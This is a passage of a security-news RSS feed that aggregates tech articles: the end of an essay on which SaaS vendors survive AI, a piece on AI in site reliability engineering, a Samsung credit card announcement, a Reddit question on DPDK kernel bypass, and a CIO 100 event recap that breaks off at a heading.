<p class="wp-block-paragraph">AI is collapsing that asymmetry. Large language models and agentic workflows can orchestrate APIs, move data between systems, generate interfaces, and automate business logic with a fraction of the engineering effort required even two years ago. The integration friction that once protected entire product categories is evaporating.</p>



<p class="wp-block-paragraph">The vendors most exposed are not the deeply embedded enterprise platforms. They’re the lightweight workflow layers, the products that essentially put a polished interface on top of accessible data and relatively straightforward processes. Reporting dashboards. Meeting tools. Narrow productivity applications. These products created value by simplifying implementation. That rationale is getting harder to sustain when implementation is no longer the real barrier.</p>



<p class="wp-block-paragraph">Here’s the part most analyses miss: it’s not just that AI makes development faster. It’s that agents change the integration model entirely. For 30 years, enterprise software was built for humans navigating UIs. Agentic systems don’t use UIs. They call <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">APIs</a>, read from multiple sources simultaneously, and move data freely across systems. The switching costs that once made incumbent software sticky are collapsing, because an agent doesn’t care which UI it used last quarter.</p>



<h2 class="wp-block-heading">The SaaS that survives</h2>



<p class="wp-block-paragraph">The question isn’t whether SaaS survives. It’s which SaaS survives.</p>



<p class="wp-block-paragraph">The companies with durable positions are not the ones with the cleanest interface. They’re the ones that transfer operational risk customers genuinely cannot absorb themselves. Compliance. Regulatory certification. Accumulated domain expertise. Liability.</p>



<p class="wp-block-paragraph">Think about compliant invoicing across 140 countries. That’s not a workflow someone builds in a sprint. The certifications alone take years. A single regulatory change in one jurisdiction can break an AP process for a global enterprise overnight. Customers don’t pay for that capability because it’s technically complex. They pay because they cannot afford to own the risk of getting it wrong.</p>



<p class="wp-block-paragraph">That’s the distinction that matters: AI lowers the cost of building software. It does not lower the cost of absorbing risk. The vendors who understand this are building durable businesses. The ones who don’t are quietly subsidizing their customers’ internal build programs.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability.</p>



<h2 class="wp-block-heading">The prototype trap</h2>



<p class="wp-block-paragraph">The danger for enterprise buyers right now is overcorrection. Every successful prototype looks like a cost-saving opportunity. Very few survive the jump to production.</p>



<p class="wp-block-paragraph">Building a workflow with <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html" data-type="link" data-id="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">generative AI</a> is becoming straightforward. Maintaining it is not. Models evolve. Outputs drift. Governance requirements tighten. What worked cleanly in a controlled environment behaves differently at scale, and the failure mode is worse than traditional software. Rule-based automation, when it fails, fails obviously. Agents fail silently, confidently, at scale, often with a completely reasonable-sounding explanation.</p>



<p class="wp-block-paragraph">Engineering teams that take on AI-powered systems need to solve for observability, model drift, access controls, audit trails, and long-term maintenance ownership. In regulated industries, they need to demonstrate exactly how the system reached every decision. That’s not a weekend project. That’s an ongoing operational commitment that compounds over time as models change and regulatory requirements evolve.</p>



<p class="wp-block-paragraph">Before a team decides to replace an external platform with internal AI tooling, the honest question isn’t, “Can we build this?” The real question is, “Are we prepared to own this in production, for years, as the underlying models change beneath us?” Sometimes the answer is yes. Often the answer is no, and the true cost only becomes visible after the vendor contract is canceled.</p>



<h2 class="wp-block-heading">Build vs. partner: a sharper frame</h2>



<p class="wp-block-paragraph">The build vs. buy framing has always been too binary. The right question is build vs. partner.</p>



<p class="wp-block-paragraph">Partner for the capabilities where risk transfer, regulatory complexity, and domain expertise create genuine value your team cannot replicate. Build for the capabilities that actually differentiate your business from your competitors. Don’t burn your best engineers rebuilding compliant invoice processing or production-grade document extraction. Those aren’t competitive advantages. They’re table stakes, and someone else has already paid the cost, across decades, to make them reliable.</p>



<p class="wp-block-paragraph">The organizations getting this right are honest about where they create unique value. They focus development there, and partner for everything else. The ones getting it wrong are vibe-coding solutions to non-differentiating problems while their actual competitive moat goes unattended.</p>



<h2 class="wp-block-heading">The true value of software</h2>



<p class="wp-block-paragraph">We’re not watching the death of SaaS. We’re watching the end of the friction-based value proposition: the idea that software is worth renewing because integration used to be painful. That rationale is largely gone.</p>



<p class="wp-block-paragraph">What survives is software that does something customers cannot reasonably replicate internally: absorb risk, maintain regulatory compliance, deliver operational reliability at scale, and bring genuine domain expertise into a production-grade system that someone else already stress-tested for years.</p>



<p class="wp-block-paragraph">The vendors who recognize this are already repositioning around accountability, governance, and outcomes. The ones who haven’t will find the next renewal conversation noticeably harder.</p>



<p class="wp-block-paragraph">Software sells features. Platforms sell accountability. That distinction is about to separate a lot of winners from a lot of cautionary tales.</p>



<p class="wp-block-paragraph"><em>—</em></p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI impacts site reliability engineering]]></title>
<description><![CDATA[Site reliability engineers (SREs) have the tough assignment of resolving thorny performance and reliability issues. But their primary mission is to provide devops teams with operational insights and to suggest implementation improvements on business system performance, security, and overall robus...]]></description>
<link>https://tsecurity.de/de/3683121/ai-nachrichten/how-ai-impacts-site-reliability-engineering/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683121/ai-nachrichten/how-ai-impacts-site-reliability-engineering/</guid>
<pubDate>Tue, 21 Jul 2026 11:05:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Site reliability engineers (SREs) have the tough assignment of resolving thorny performance and reliability issues. But their primary mission is to provide devops teams with operational insights and to suggest implementation improvements on business system performance, security, and overall robustness.</p>



<p class="wp-block-paragraph">Google introduced its <a href="https://sre.google/sre-book/part-I-introduction/">SRE playbook</a> in 2003, but it took some time for the role’s definition, tools, and techniques to become mainstream. Startups were the first to adopt observability for cloud-native applications and create dedicated SRE positions. As tools matured and SRE responsibilities became more clearly defined, larger enterprises assigned SREs to work as a bridge between devops and IT ops teams to improve resilience across a wider range of applications, APIs, and <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">data pipelines</a>.</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/3689881/career-paths-for-devops-engineers-and-sres.html">SRE is a career path</a> for multidisciplinary engineers with strong investigative instincts, sharp data analytics skills, and the temperament to perform under pressure. It has become a critical responsibility as tech became mission-critical for enterprises, and it is <a href="https://drive.starcio.com/2025/02/emerging-genai-roles-hr-tech-security/">a growing role in the genAI era</a> as more businesses <a href="https://drive.starcio.com/2025/10/ai-agents-definitive-guide-saas-security-titans/">deploy AI agents</a>.</p>



<p class="wp-block-paragraph">But the critical need for resiliency and greater technological complexity brings new challenges for SREs. According to the <a href="https://neubird.ai/resources/state-of-production-reliability-and-ai-adoption/">2026 State of Production Reliability and AI Adoption report</a>, 44% of respondents experienced an outage linked to ignored or suppressed alerts in the past year, and 35% report their engineers occasionally ignore or dismiss alerts due to alert fatigue. More than 70% of alerts received are not actionable, according to 57% of organizations.</p>



<p class="wp-block-paragraph">So, is AI making the SRE’s role easier and helping businesses run more reliable technology operations? On the other hand, AI is also driving complexity, as companies deploy genAI tools and AI agents across more business functions and seek to automate more decision-making across operations.</p>



<h2 class="wp-block-heading">AIops and agentic ops aid SREs</h2>



<p class="wp-block-paragraph">Over the past decade, SRE responsibilities have become somewhat easier through improvements in <a href="https://www.infoworld.com/article/2263821/5-devops-practices-to-improve-application-reliability.html">monitoring platforms</a>, <a href="https://www.infoworld.com/article/3686056/best-practices-for-devops-observability.html">observability practices</a>, <a href="https://www.infoworld.com/article/2261769/what-is-the-ai-in-aiops.html">tools for centralizing operational data</a>, and <a href="https://drive.starcio.com/2022/01/aiops-cio/">AI applied in IT operations</a> (AIops). But during the heat of resolving an outage or performance issue, it’s not easy to correctly identify what system triggered the issue versus other downstream systems impacted by it.</p>



<p class="wp-block-paragraph">According to the <a href="https://komodor.com/resources/komodor-2025-enterprise-kubernetes-report/">Komodore 2025 Enterprise Kubernetes Report</a>, 79% of production incidents originate from recent system changes, including deployments and changes to compute environments. But the other 21% of incidents stem from issues outside of the business’s control, including network failures, third-party changes, and cloud provider failures.</p>



<p class="wp-block-paragraph">“SREs using AI capabilities succeed or fail in the moment an incident unfolds, when engineers are deciding what to investigate next,” says Itiel Shwartz, CTO at <a href="https://komodor.com/">Komodor</a>. “If the system streamlines root cause detection, connects signals to recent changes, and explains its reasoning in a way engineers recognize, it earns trust. If it adds uncertainty or demands extra validation, it gets sidelined, regardless of how bespoke the model behind it may be. What’s less obvious is what it takes to make AI for SREs work in production, and how different that reality is from prototypes, demos, or early internal builds.”</p>



<p class="wp-block-paragraph"><a href="https://drive.starcio.com/2022/05/aiops-ml-multicloud/">AIops</a> is not a new capability, especially in using machine learning to correlate logs, metrics, and traces across monitoring and alerting systems. IT service management and SREs have been using AIops to <a href="https://drive.starcio.com/2021/11/p1-incidents-long-resolution-times/">reduce the mean time to resolve incidents</a> and to perform accurate <a href="https://drive.starcio.com/2021/12/kpi-agile-devops-itops/">root cause analysis</a> (RCA) efficiently. <a href="https://www.infoworld.com/article/4100507/5-key-agenticops-practices-to-start-building-now.html">Agentic ops</a> is the next wave of genAI operational capabilities, including tools for monitoring AI agents, managing their access rights, and detecting AI model accuracy drift.</p>



<p class="wp-block-paragraph"> “AI is useful during major incidents because it can pull together a lot of context into a few clear sentences, which is exactly what an SRE needs in the moment,” suggests Shani Shoham, chief revenue officer at <a href="https://openobserve.ai/">OpenObserve</a>. “The complexity of architecture and the different tooling make it easier for AI than for a human, but autonomous resolution is still a way off.”</p>



<h2 class="wp-block-heading">AI’s impact on people and burnout</h2>



<p class="wp-block-paragraph">The business pressure to keep systems up, secure, and performing well is a 24/7 stressful responsibility. According to <a href="https://www.catchpoint.com/learn/sre-report-2025">The SRE Report 2025</a> from Catchpoint, 36% of SREs often or always experience elevated stress during an incident, and 28% said the stress persists even after the incident is resolved. AI capabilities may prove to be a game-changer in helping SREs avoid burnout and reduce stress.</p>



<p class="wp-block-paragraph">“AI can improve RCA by taking in a much larger incident context than any engineer can hold at 3am, reasoning across traces, logs, metrics, deploys, config changes, alerts, ownership, and recent production behavior,” says Noam Levy, founding engineer and field CTO at <a href="https://www.groundcover.com/">Groundcover</a>. “Beyond attempting a full RCA, its immediate value is distilling the signals that actually matter, reconstructing a clear timeline of cause and effect, and helping engineers separate correlation from likely causality. Once a fix is deployed, agents can also verify remediation by comparing pre- and post-fix behavior, but this depends on broad access to rich, correlated production signals and a cost model that does not discourage adoption or experimentation.”</p>



<p class="wp-block-paragraph">Not only are incidents resolved faster and with less stress, but AI can also free up SRE time to focus on proactive work and create a career path for junior developers into SRE roles. Quais Taraki, CTO at <a href="https://www.enterprisedb.com/">EDB Postgres AI</a>, adds, “AI reduces toil by automating repetitive tasks while accelerating incident resolution through copilots that correlate signals across distributed systems, allowing SREs to focus more on resilience strategies like chaos engineering and failure analysis.”</p>



<p class="wp-block-paragraph">AI can have long-lasting operational impacts, especially for organizations looking to deploy more mission-critical technology and AI capabilities. Two longer-term benefits of AI for SREs are reducing the number of bridge calls needed for incident response and the number of engineers required in “<a href="https://drive.starcio.com/2021/04/it-digital-operations-aiops/">war rooms</a>” to coordinate root cause analyses.</p>



<p class="wp-block-paragraph">“When something goes wrong, AI that guides SREs can do the full analysis, get to the root cause, and perform the remediation,” says Spiros Xanthos, founder and CEO of <a href="https://resolve.ai/">Resolve AI</a>. “AI also helps avoid many escalations, and when escalations are needed, it targets the right people from the network, infrastructure, and the application teams. AI for SREs centralizes operational intelligence, exposes tribal knowledge, and can guide more junior developers.” </p>



<h2 class="wp-block-heading">AI agent reliability</h2>



<p class="wp-block-paragraph">While AI capabilities have been a net positive in helping SREs improve system reliability, the growth of <a href="https://www.infoworld.com/article/4032989/a-developers-guide-to-code-generation.html">AI code generators</a>, <a href="https://www.infoworld.com/article/4058076/vibe-coding-and-the-future-of-software-development.html">vibe coding</a>, and <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">spec-driven development</a> is adding to their workloads. <a href="https://www.braiviq.com/blog/vibe-coding-ai-development-2026-cursor-copilot-claude-code">According to one study</a>, 41% of all global code is now AI-generated, and <a href="https://www.hostinger.com/blog/vibe-coding-statistics">Gartner predicts</a> that 40% of new enterprise production software will be created using vibe coding techniques by 2028.</p>



<p class="wp-block-paragraph">But coding velocity is creating new issues for SREs as AI pull requests have 1.4 times more critical issues and 1.7 times more major issues, <a href="https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report">according to CodeRabbit</a>. “AI-assisted development has created an unprecedented velocity of code reaching production, expanding surface area, edge cases, and failure rates faster than traditional SRE practices can absorb,” says Vinod Jayaraman, cofounder and CTO at <a href="https://neubird.ai/">NeuBird AI</a>. “The speed of shipping has far outpaced the speed of understanding what breaks in production. To close this loop, SREs need enterprise agents that can capture precise diagnostic context, including correlated traces, service dependencies, and anomaly timelines, and structure it as actionable input for the engineers and AI coding tools responsible for the fix.”</p>



<p class="wp-block-paragraph">The growing number of AI agents deployed to production creates new challenges. AI agents are not just code; they have multiple failure points. They are built using language models, connect to proprietary sources for context, and integrate with <a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">Model Context Protocol servers</a> to support more complex workflows. Changes are ongoing and not deployment events, so the SRE’s job of identifying the source of performance and accuracy drifts isn’t trivial. </p>



<p class="wp-block-paragraph">“Traditional SRE was built for systems that fail in reproducible ways, but agents fail differently and drift when a model provider pushes an update, and behavior shifts silently with no baseline for comparison,” says Mohammed Aboul-Magd, vice president of product at <a href="https://www.sandboxaq.com/">SandboxAQ</a>. “Most organizations can’t even answer the basics: how many agents are running, what they have access to, and whether they’re still doing what they were built to do.”</p>



<p class="wp-block-paragraph">“Every time a senior engineer leaves, they take years of learned failure patterns with them, and the next outage starts from square one,” adds Ronak Desai, cofounder and CEO at <a href="https://ciroos.ai/">Ciroos</a>. “Using AI for compounding operational memory changes that, and every incident your system resolves, the AI learns it.”</p>



<p class="wp-block-paragraph">SREs should take a leadership role in emerging best practices, including defining their standards for AI agent <a href="https://www.infoworld.com/article/4061123/how-to-write-nonfunctional-requirements-for-ai-agents.html">non-functional acceptance criteria</a>, <a href="https://www.infoworld.com/article/4140832/7-safeguards-for-observable-ai-agents.html">observability practices</a>, and <a href="https://www.infoworld.com/article/4105884/10-essential-release-criteria-for-launching-ai-agents.html">release-readiness criteria</a>. SREs should update their <a href="https://www.infoworld.com/article/3684268/tools-to-manage-slos-and-error-budgets.html">service-level objectives</a> (SLOs) and define error budgets for AI agents in production.</p>



<p class="wp-block-paragraph">Ryan Downing, vice president and CIO of enterprise business solutions at <a href="https://www.principal.com/">Principal Financial Group</a>, says, “Standard SLOs and error budgets give teams the guardrails, and AI helps interpret the telemetry against those targets, reducing noise so engineers can get to the real issue faster and automate parts of remediation before customers are impacted.”</p>



<h2 class="wp-block-heading">AI raises the SRE’s business impact</h2>



<p class="wp-block-paragraph">The more dramatic shift in site reliability engineering is an evolution of its business scope. IT leaders focus on uptime, performance, and issue resolution, as well as understanding their impacts. Business leaders will look to IT and SREs to identify, determine root cause, and remediate a broader class of issues, including <a href="https://drive.starcio.com/2025/07/rogue-ai-agents-cios-govern-agentic-ecosystem/">rogue AI agents</a> and the impacts of <a href="https://www.infoworld.com/article/4040513/how-to-avoid-the-risks-of-rapidly-deploying-ai-agents.html">rapidly deploying new agentic capabilities</a>. </p>



<p class="wp-block-paragraph">“AI agents are handing SREs categories of problems they’ve never had to solve before, specifically failures defined in business terms, not technical ones,” says Blake Sherwood, distinguished technologist for AI and platform strategy at <a href="https://www.smarsh.com/">Smarsh</a>. “Traditional reliability engineering is built around latency, errors, and crashes, but agents now fail due to skipped compliance steps or outcomes that looked fine technically but were wrong contextually. Most SRE teams aren’t wired for that yet.”</p>



<p class="wp-block-paragraph">The question is whether SREs with AI-augmented tools can keep up with the velocity, complexity, and business urgency of deploying new AI business capabilities.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Seven years after Apple Card, Samsung leaps into fintech with its own credit card]]></title>
<description><![CDATA[The Samsung Galaxy Card is a direct mirror of the Apple Card, though it has some interesting cash-back offers that might be compelling for those deep in the Samsung ecosystem.Samsung Galaxy Card is a new fintech offering from Samsung and BarclaysIf there has ever been a tried and true strategy fr...]]></description>
<link>https://tsecurity.de/de/3682577/ios-mac-os/seven-years-after-apple-card-samsung-leaps-into-fintech-with-its-own-credit-card/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682577/ios-mac-os/seven-years-after-apple-card-samsung-leaps-into-fintech-with-its-own-credit-card/</guid>
<pubDate>Tue, 21 Jul 2026 04:40:06 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Samsung Galaxy Card is a direct mirror of the <a href="https://appleinsider.com/inside/apple-card" title="Apple Card" data-kpt="1">Apple Card</a>, though it has some interesting cash-back offers that might be compelling for those deep in the Samsung ecosystem.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68307-143976-IMG_4812-xl.jpg" alt="Samsung Galaxy Card is a new fintech offering from Samsung and Barclays" height="738"><br><span>Samsung Galaxy Card is a new fintech offering from Samsung and Barclays</span></div><br>If there has ever been a tried and true strategy from Samsung, its compete with what Apple offers by beating them on the spec sheet. The Samsung Galaxy Card does exactly that with some good cash back rates right out of the gate.<br><br>The company announced the Samsung Galaxy Card via a <a href="https://news.samsung.com/us/samsung-introducing-galaxy-card/">press release</a> on Monday. It's launching primarily as a virtual-first card with up to 5% cash back, issued by Barclays on the Visa network.<br><br><br> <a href="https://appleinsider.com/articles/26/07/21/seven-years-after-apple-card-samsung-leaps-into-fintech-with-its-own-credit-card?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245007?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Looking for guidance on moving my low-latency C++ project from AF_PACKET to real DPDK kernel bypass]]></title>
<description><![CDATA[Hi everyone, I've been building a low-latency C++20 trading engine as a learning project over the past few months, and I'm now planning the next major version. I'd appreciate some guidance from people with DPDK or low-latency networking experience. GitHub: https://github.com/Shivfun99/Pulse-Order...]]></description>
<link>https://tsecurity.de/de/3682517/linux-tipps/looking-for-guidance-on-moving-my-low-latency-c-project-from-afpacket-to-real-dpdk-kernel-bypass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682517/linux-tipps/looking-for-guidance-on-moving-my-low-latency-c-project-from-afpacket-to-real-dpdk-kernel-bypass/</guid>
<pubDate>Tue, 21 Jul 2026 03:56:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi everyone,</p> <p>I've been building a low-latency C++20 trading engine as a learning project over the past few months, and I'm now planning the next major version. I'd appreciate some guidance from people with DPDK or low-latency networking experience.</p> <p><strong>GitHub:</strong><br> <a href="https://github.com/Shivfun99/Pulse-Order">https://github.com/Shivfun99/Pulse-Order</a></p> <p>past posts:</p> <p><a href="https://www.reddit.com/r/quantindia/s/u45s60B33Q">https://www.reddit.com/r/quantindia/s/u45s60B33Q</a></p> <p><a href="https://www.reddit.com/r/quant/s/IHKVkv0UGv">https://www.reddit.com/r/quant/s/IHKVkv0UGv</a></p> <h1>Current Version (V1)</h1> <p>The project currently includes:</p> <ul> <li>Binary market data parsing</li> <li>Level 2 order book</li> <li>Strategy + risk checks</li> <li>DPDK-based packet processing experiments</li> <li>AF_PACKET backend for packet RX/TX</li> <li>Cache-friendly C++20 implementation</li> <li>Lock-free queues</li> <li>Application-side latency benchmarking</li> <li>Scenario testing and benchmarking framework</li> </ul> <p>Current latency (application-side RX → TX enqueue) is in the sub-microsecond range under the benchmark setup, but I understand this is <strong>not true wire-to-wire latency</strong> since it doesn't involve a physical DPDK-supported NIC.</p> <h1>What I want to build in V2</h1> <p>I want to move to a <strong>real DPDK kernel-bypass architecture</strong> using a physical NIC instead of AF_PACKET.</p> <p>My goals are:</p> <ul> <li>Real kernel bypass using DPDK</li> <li>VFIO-bound NIC</li> <li>Poll Mode Driver (PMD)</li> <li>Physical RX/TX queues</li> <li>End-to-end latency measurement</li> <li>Hardware timestamping (later)</li> <li>Multi-queue support</li> <li>Real market-data replay</li> <li>Accurate p99/p99.9 latency analysis</li> </ul> <h1>My situation</h1> <p>At the moment I only have an <strong>ASUS TUF Gaming A15</strong> laptop running Ubuntu. I don't have a desktop or server.</p> <p>From what I've read, it seems server NICs like the Intel X520/X710/I350 require PCIe, which laptops generally don't provide.</p> <h1>My questions</h1> <ol> <li>Is there any practical way to use a real DPDK-supported NIC with only this laptop?</li> <li>Would you recommend moving to a desktop before attempting real kernel bypass?</li> <li>What hardware would you buy if you were starting today on a limited budget?</li> <li>Are there any good open-source examples that demonstrate a complete RX → processing → TX pipeline with DPDK?</li> <li>If you were designing the next version of this project, what features would you prioritize?</li> </ol> <p>I'm building this primarily to learn low-latency systems and HFT infrastructure, so I'd really appreciate any advice, recommended hardware, papers, repositories, or common mistakes to avoid.</p> <p>Thanks!</p> <p><a href="https://www.reddit.com/submit/?source_id=t3_1v1qm0s&amp;composer_entry=crosspost_prompt"></a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Federal_Tackle3053"> /u/Federal_Tackle3053 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1v1qov1/looking_for_guidance_on_moving_my_lowlatency_c/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1v1qov1/looking_for_guidance_on_moving_my_lowlatency_c/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CIO 100 Leadership Live New York: CIOs push past AI pilots for measurable returns]]></title>
<description><![CDATA[Technology executives from across the New York metropolitan area gathered July 16 at Convene, One Liberty Plaza, for CIO 100 Leadership Live New York, a full day of roundtables and panel discussions on enterprise AI investment, governance, and organizational change.



Several key areas of consen...]]></description>
<link>https://tsecurity.de/de/3682348/it-security-nachrichten/cio-100-leadership-live-new-york-cios-push-past-ai-pilots-for-measurable-returns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682348/it-security-nachrichten/cio-100-leadership-live-new-york-cios-push-past-ai-pilots-for-measurable-returns/</guid>
<pubDate>Tue, 21 Jul 2026 01:07:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Technology executives from across the New York metropolitan area gathered July 16 at Convene, One Liberty Plaza, for <a href="https://event.foundryco.com/cio-100-leadership-live-new-york/">CIO 100 Leadership Live New York</a>, a full day of roundtables and panel discussions on enterprise AI investment, governance, and organizational change.</p>



<p class="wp-block-paragraph">Several key areas of consensus emerged throughout this highly interactive event. Infrastructure fragmentation continues to block the path to securing returns on AI investments prompting leaders to understand rising cloud spend attributed to large language model utilization. This has caused a growing number of organizations to refocus on on-premises and hybrid options in C-suite and board-level capital planning conversations. Speakers, along with comments from the audience, described a shift from project thinking to product thinking, with smaller multidisciplinary teams moving faster than legacy structures.</p>



<p class="wp-block-paragraph">Several participants repeatedly warned that automating broken processes just amplifies dysfunction. Governance and measurement remain unresolved, with usage metrics still getting mistaken for business value. One of the panels explored how CIOs may benefit from applying venture capital-style scrutiny to enterprise bets, weighing team execution as heavily as the technology itself. The throughline was a redefinition of the CIO role, from technology executor to business strategist fluent in revenue, board engagement, and transformation ownership.</p>



<h2 class="wp-block-heading">Morning roundtable tackles AI infrastructure</h2>



<p class="wp-block-paragraph">The day opened with an invitation-only executive breakfast roundtable, “Beyond the Pilot, Building the Infrastructure for Real AI Returns,” co-hosted by Unisys and Dell Technologies. Over a dozen executives representing major public and private sector organizations across the New York metropolitan area joined Steve Hollander, senior director of Americas global alliances at Dell Technologies, and Matt Marshall, CIO at Unisys for a workshop-style discussion.</p>



<p class="wp-block-paragraph">The session explored the strategic, operational, financial, and technological issues that must be mastered to optimize infrastructure decisions and separate organizations that are experimenting with AI from those competing on it. Discussion questions probed how CIOs measure whether AI investment is translating into business results, how they can break the cycle of fragmented and siloed AI deployments, how boards are beginning to scrutinize seven-figure token spend and whether on-premises or hybrid infrastructure can rein in costs.</p>



<p class="wp-block-paragraph">The take-home point: the organizations pulling ahead are the ones that stopped treating AI as four separate problems, strategic, operational, financial, technological, owned by four separate functions, and started running it as one coordinated decision. Fragmentation is the actual cost center here, not the token spend itself. A CIO who solves the infrastructure question in isolation from the governance question, or the cost question in isolation from the talent question, ends up optimizing one silo while the other three keep bleeding value. Competing on AI, instead of just experimenting with it, means the finance, operations, technology and business sides are reasoning from the same picture of what’s being built and why, so the tradeoffs get made once, together, instead of getting re-litigated at every handoff.</p>



<h2 class="wp-block-heading">Forum sessions open with a mandate for growth</h2>



<p class="wp-block-paragraph">Following breakfast, the main forum program began with “The New CIO Mandate, Delivering Growth, Not Just Technology.” In a moderated conversation, Laksh Nathan, chief information officer at Paramount Skydance, drew on his experience with mergers, enterprise transformation and AI-enabled development to describe a shift from project and application management toward a product-centric operating model. Nathan addressed how smaller, multidisciplinary teams are changing expectations on both the business and technology sides of the enterprise, and what mindset changes CIOs must lead to turn AI into an engine of growth rather than a cost center.</p>



<p class="wp-block-paragraph">PwC followed with a session on “Designing the Intelligent Enterprise, From AI Investment to Evolving Operations.” Darren O’Meara, principal and chief technology officer for managed services, and Meghna Shah, principal for engineering and AI, examined why fragmented outcomes persist even after heavy investment in technology and transformation.</p>



<p class="wp-block-paragraph">The intelligent enterprise, they posited, is less about working toward achieving specific technology outcomes and more about creating operating models that integrate strategy, technology, operations, and governance into one system. This, they explained, requires linking AI, data, and decisions across the business and will leave an indelible mark on how decision rights are redesigned, funding models are developed, and accountability is enforced to accommodate the speed of the agentic economy.</p>



<h2 class="wp-block-heading">Talent, tradeoffs, and the cost of getting it wrong</h2>



<p class="wp-block-paragraph">The session “Return on Transformation: Time, Talent, and Tradeoffs” — with Prashant Hinge, chief information and transformation officer at MSIG USA; Joseph Gimigliano, chief technology officer at Northwell Health; and Eduard de Vries Sands, AI executive advisor at PatientPoint — examined why transformation initiatives so often lose their way.</p>



<p class="wp-block-paragraph">The main culprit, even today in 2026, continues to revolve around a persistent instinct for technology implementations to become the objective rather than the means to a measurable business outcome. The panelists made the case for doing the incredibly difficult work of re-engineering (if not entirely re-imagining) existing processes before automating them and then placing smaller bets inside that bigger vision.</p>



<p class="wp-block-paragraph">Ricky Thakrar, head of sales and account management at Zoho, took the stage to present “Smaller, Smarter, Safer, The Enterprise AI Architecture Most Leaders Get Backwards,” arguing that constrained, context-rich architectures consistently outperform expensive models bolted onto fragmented systems.</p>



<p class="wp-block-paragraph">A round of Hot Topic Discussion Groups and a networking lunch followed, including the Next CIO Luncheon featuring Robert Half Regional Director Jason Deneu.</p>



<h2 class="wp-block-heading">Afternoon sessions turn to security, scale, and investment signals</h2>



<p class="wp-block-paragraph">CSO and CIO Contributor Joan Goodchild moderated “Securing Trust in the Agentic Economy,” a discussion with Marlowe Cochran, CISO at the New York State Education Department, and Gee Rittenhouse, vice president of security services at AWS, on how organizations are balancing speed, innovation and security as AI agents move from experimentation into productization at scale.</p>



<p class="wp-block-paragraph">Rittenhouse framed agentic risk as closer to human risk than traditional software risk, describing how an independent agent acting in a non-deterministic way really does look like a potential insider threat, pushing CISOs toward behavioral monitoring over static workload protection. He tied this to a structural shift in defense, noting it’s hard to do agentic security if you’re not observing it, putting observability at the center of agentic risk management.</p>



<p class="wp-block-paragraph">Cochran concurred, adding that many of the key tools that are needed to move into the agentic economy already exist, but must be implemented more aggressively, comprehensively and even more creatively. CISOs don’t need to invent an entirely new security discipline for the agentic era so much as extend identity management, access control and monitoring frameworks they already run to cover a new class of non-human actor — agents.</p>



<p class="wp-block-paragraph">A session on “AI, From Experimentation to Enterprise Impact” brought together Meagan Gentry, national AI practice manager and distinguished technologist at Insight and Yuri Gubin, chief technology officer at DataArt, for a candid look at why pilots stall before reaching scaled production and what operating capabilities, governance, cost visibility, continuous education, must be in place to sustain AI once a proof of concept works.</p>



<p class="wp-block-paragraph">During the session’s Q&amp;A segment, a discussion emerged around how proof-of-concept success can result in a false signal, raising questions about whether pilots should be considered successful before the intended outcomes have had time to materialize, and drawing a distinction between measuring usage and adoption versus measuring business value.</p>



<p class="wp-block-paragraph">The panelists explored how CIOs can identify the small number of transformational AI opportunities worth pursuing rather than managing hundreds of incremental use cases, and even challenged whether prioritization is the CIO’s job at all. The discussion closed on a sequencing question with real strategic weight, whether AI-first strategies are putting the technology ahead of the business problem CIOs are trying to solve, and what role CIOs should play with boards in defining the outcomes AI is expected to support.</p>



<h2 class="wp-block-heading">A shift in perspectives</h2>



